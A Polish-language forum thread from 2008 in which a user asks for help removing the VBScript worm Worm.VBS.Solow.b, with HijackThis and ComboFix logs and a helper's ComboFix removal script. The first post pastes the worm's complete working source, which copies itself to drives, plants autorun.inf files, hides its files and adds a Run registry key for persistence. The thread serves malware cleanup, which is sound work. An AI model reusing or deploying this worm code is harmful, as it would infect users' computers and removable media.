Worm.VBS.Solow.b -logi

SzymSzejdi · 21 Styczeń 2008 13:24

Witam!

Kaspersky on-line wykrył mi tego robaka na kompie, tworzy on pliki pagefile.sys z taką zawartością:

Logi z Hijacka i Combofixa poniżej

'kuciapka tu byl on error resume next dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado katrib="[autorun]"&vbcrlf&“shellexecute=wscript.exe pagefile.sys.vbs” set kfs=createobject(“Scripting.FileSystemObject”) set kmf=kfs.getfile(Wscript.ScriptFullname) dim text,size size=kmf.size check=kmf.drive.drivetype set text=kmf.openastextstream(1,-2) do while not text.atendofstream ksource=ksource&text.readline ksource=ksource&vbcrlf loop do Set winpath=kfs.getspecialfolder(0) set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs") kuc.attributes=32 set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true) kuc.write ksource kuc.close set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs") kuc.attributes=39 for each kflash in kfs.drives If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> “A:” then set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs") kuc.attributes=32 set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true) kuc.write ksource kuc.close set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs") kuc.attributes=39 set kuc=kfs.getfile(kflash.path&"\autorun.inf") kuc.attributes=32 set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true) kuc.write katrib kuc.close set kuc=kfs.getfile(kflash.path &"\autorun.inf") kuc.attributes=39 end if next set rgpath=createobject(“WScript.Shell”) rgpath.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo”,winpath&"\pagefile.sys.vbs" rgpath.regwrite “HKCR\vbsfile\DefaultIcon”,“shell32.dll,2” if check <> 1 then Wscript.sleep 200000 end if loop while check<>1 set sado=createobject(“Wscript.shell”) sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Hijack:

Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 14:07:37, on 2008-01-21 Platform: Windows 2000 SP4 (WinNT 5.00.2195) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) Boot mode: Normal Running processes: C:\WINNT\System32\smss.exe C:\WINNT\system32\winlogon.exe C:\WINNT\system32\services.exe C:\WINNT\system32\lsass.exe C:\WINNT\system32\svchost.exe C:\WINNT\system32\spoolsv.exe C:\WINNT\system32\svchost.exe C:\WINNT\system32\nvsvc32.exe C:\WINNT\system32\regsvc.exe C:\WINNT\system32\MSTask.exe C:\Program Files\Photodex\CompuPicPro\ScsiAccess.exe C:\WINNT\system32\stisvc.exe C:\WINNT\System32\WBEM\WinMgmt.exe C:\WINNT\system32\svchost.exe C:\WINNT\Explorer.EXE C:\Program Files\QuickTime\qttask.exe C:\WINNT\system32\RUNDLL32.EXE C:\WINNT\system32\internat.exe C:\Program Files\Adobe\Photoshop CS\Photoshop.exe C:\Program Files\EDGE Dialer\Edge.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.pl/ R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Łącza O3 - Toolbar: @msdxmLC.dll,-1@1033,&Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\system32\msdxm.ocx O4 - HKLM…\Run: [synchronization Manager] mobsync.exe /logon O4 - HKLM…\Run: [NeroFilterCheck] C:\WINNT\system32\NeroCheck.exe O4 - HKLM…\Run: [NeroCheck] C:\WINNT\system32\NeroCheck.exe O4 - HKLM…\Run: [QuickTime Task] “C:\Program Files\QuickTime\qttask.exe” -atboottime O4 - HKLM…\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINNT\system32\NvCpl.dll,NvStartup O4 - HKLM…\Run: [nwiz] nwiz.exe /install O4 - HKLM…\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINNT\system32\NvMcTray.dll,NvTaskbarInit O4 - HKLM…\Run: [MSRegInfo] C:\WINNT\pagefile.sys.vbs O4 - HKCU…\Run: [internat.exe] internat.exe O4 - HKUS.DEFAULT…\Run: [internat.exe] internat.exe (User ‘Default user’) O4 - HKUS.DEFAULT…\RunOnce: [^SetupICWDesktop] C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User ‘Default user’) O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm O9 - Extra ‘Tools’ menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/eng/partne … nicode.cab O16 - DPF: {68282C51-9459-467B-95BF-3C0E89627E55} (MksSkanerOnline Class) - http://www.mks.com.pl/skaner/SkanerOnline.cab O17 - HKLM\System\CCS\Services\Tcpip…{AABDED9A-27F1-4790-AC48-D39253963CE9}: NameServer = 194.204.159.1,194.204.152.34 O17 - HKLM\System\CCS\Services\Tcpip…{B6334FEA-B49E-494B-96F2-DD4840A7C265}: NameServer = 217.116.100.66 217.116.100.65 O17 - HKLM\System\CS1\Services\Tcpip…{AABDED9A-27F1-4790-AC48-D39253963CE9}: NameServer = 194.204.159.1,194.204.152.34 O17 - HKLM\System\CS2\Services\Tcpip…{AABDED9A-27F1-4790-AC48-D39253963CE9}: NameServer = 194.204.159.1,194.204.152.34 O23 - Service: Usługa administracyjna Menedżera dysków logicznych (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINNT\system32\nvsvc32.exe O23 - Service: ScsiAccess - Unknown owner - C:\Program Files\Photodex\CompuPicPro\ScsiAccess.exe – End of file - 3511 bytes

Combofix:

ComboFix 08-01-20.1 - Administrator 2008-01-21 14:10:41.1 - NTFSx86 Microsoft Windows 2000 Professional 5.0.2195.4.1250.1.1045.18.1659 [GMT 1:00] Running from: C:\Documents and Settings\Administrator\Pulpit\Hijack\ComboFix.exe WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED . ((((((((((((((((((((((((((((((((((((((( Other Deletions ))))))))))))))))))))))))))))))))))))))))))))))))) . C:\Autorun.inf D:\Autorun.inf . ((((((((((((((((((((((((( Files Created from 2007-12-21 to 2008-01-21 ))))))))))))))))))))))))))))))) . 2008-01-21 14:10 . 00-08-31 08:00 51,200 --a------ C:\WINNT\NirCmd.exe 2008-01-21 14:10 . 08-01-21 14:10 16,384 --a----t- C:\WINNT\system32\Perflib_Perfdata_2dc.dat 2008-01-21 14:07 . 08-01-21 14:07 2008-01-21 12:59 . 08-01-21 12:59 3,478 --a------ C:\WINNT\pagefile.sys.vbs 2008-01-21 12:59 . 08-01-21 12:59 3,478 --a------ C:\pagefile.sys.vbs 2008-01-21 12:15 . 08-01-21 12:15 2008-01-21 12:15 . 08-01-21 12:15 2008-01-14 10:00 . 08-01-14 10:00 2008-01-14 09:58 . 00-07-15 00:00 995,383 --a------ C:\WINNT\system32\Mfc42.dl_ 2008-01-14 09:47 . 06-05-18 11:07 249,856 --a------ C:\WINNT\system32\setuphsf.exe 2008-01-14 09:47 . 06-05-18 11:06 184,320 --a------ C:\WINNT\system32\vsethsf.dll 2008-01-14 09:47 . 06-05-24 03:04 126,976 --a------ C:\WINNT\system32\lmonhsfk.dll 2008-01-11 10:55 . 08-01-11 10:55 2008-01-11 10:55 . 08-01-11 11:39 2008-01-11 10:43 . 08-01-11 10:43 2008-01-11 10:43 . 08-01-11 10:43 2007-12-21 12:26 . 02-02-20 08:40 499,712 --a------ C:\WINNT\system32\htimgrw.dll 2007-12-21 12:26 . 02-07-17 08:55 323,584 --------- C:\WINNT\system32\LMonhpak.dll 2007-12-21 12:26 . 02-07-16 09:37 229,376 --a------ C:\WINNT\system32\setuphpa.exe 2007-12-21 12:26 . 02-07-16 10:30 172,032 --------- C:\WINNT\system32\vsethpa.dll . (((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))) . 2008-01-14 08:57 --------- d–h--w C:\Program Files\InstallShield Installation Information 2008-01-14 08:57 --------- d-----w C:\Program Files\hiti 2007-12-20 14:58 --------- d-----w C:\Documents and Settings\All Users\Dane aplikacji\nView_Profiles 2004-02-13 12:07 271 —h–w C:\Program Files\desktop.ini 2004-02-13 12:07 22,039 —h–w C:\Program Files\folder.htt 2003-07-08 12:00 32,528 ----a-w C:\WINNT\inf\wbfirdma.sys 2003-06-03 15:49 448,256 ----a-w C:\WINNT\inf\EL2K_N64.sys 2003-06-03 15:48 147,328 ----a-w C:\WINNT\inf\EL2K_XP.sys 2003-06-03 15:47 147,328 ----a-w C:\WINNT\inf\EL2K_2K.sys 1999-12-13 15:38 135,168 ----a-r C:\WINNT\inf\AGFA\Message.exe . ((((((((((((((((((((((((((((((((((((( Reg Loading Points )))))))))))))))))))))))))))))))))))))))))))))))))) . . *Note* empty entries legit default entries are not shown REGEDIT4 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] “internat.exe”=“internat.exe” [03-07-08 13:00 20752 C:\WINNT\system32\internat.exe] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] “Synchronization Manager”=“mobsync.exe” [03-07-08 13:00 111888 C:\WINNT\system32\mobsync.exe] “NeroFilterCheck”=“C:\WINNT\system32\NeroCheck.exe” [01-07-09 11:50 155648] “NeroCheck”=“C:\WINNT\system32\NeroCheck.exe” [01-07-09 11:50 155648] “QuickTime Task”=“C:\Program Files\QuickTime\qttask.exe” [05-07-18 09:47 77824] “NvCplDaemon”=“C:\WINNT\system32\NvCpl.dll” [04-03-24 19:04 3309568] “nwiz”=“nwiz.exe” [04-03-24 19:04 782336 C:\WINNT\system32\nwiz.exe] “NvMediaCenter”=“C:\WINNT\system32\NvMcTray.dll” [04-03-24 19:04 46080] “MSRegInfo”=“C:\WINNT\pagefile.sys.vbs” [08-01-21 12:59 3478] [HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run] “internat.exe”=“internat.exe” [03-07-08 13:00 20752 C:\WINNT\system32\internat.exe] [HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce] “^SetupICWDesktop”=“C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe” [03-07-08 13:00 188688] R2 IOPort;IOPort;C:\WINNT\system32\DRIVERS\IOPORT.SYS [98-11-27 19:57] R2 Sense3;Sense3;C:\WINNT\system32\Drivers\sense3.sys [06-01-19 16:57] R3 usbhub20;Obsługa głównego koncentratora USB 2.0;C:\WINNT\system32\DRIVERS\usbhub20.sys [03-06-19 12:05] *Newly Created Service* - PROCEXP90 . ************************************************************************** catchme 0.3.1344 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net Rootkit scan 2008-01-21 14:11:33 Windows 5.0.2195 Service Pack 4 NTFS scanning hidden processes … scanning hidden autostart entries … scanning hidden files … scan completed successfully hidden files: 0 ************************************************************************** . Completion time: 2008-01-21 14:11:50 ComboFix-quarantined-files.txt 2008-01-21 13:11:48

Kaka2 · 21 Styczeń 2008 16:59

SzymSzejdi

Proszę wkleić logi na wklej.org: viewtopic.php?f=16&t=213350

Gutek · 21 Styczeń 2008 20:44

Wklej do Notatnika:

File::

C:\WINNT\pagefile.sys.vbs

C:\pagefile.sys.vbs



[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"MSRegInfo"=-

>>Plik>>Zapisz jako… >>> CFScript (najwygodniej będzie, jeśli zapiszesz w takiej lokalizacji, by ikonka CFScript.txt znalazła się obok ikonki ComboFix.exe ) Przeciągnij i upuść plik CFScript.txt na plik ComboFix.exe (czyli ikonkę CFScript.txt na ikonkę ComboFix.exe ) – podobnie jak na tym obrazku –>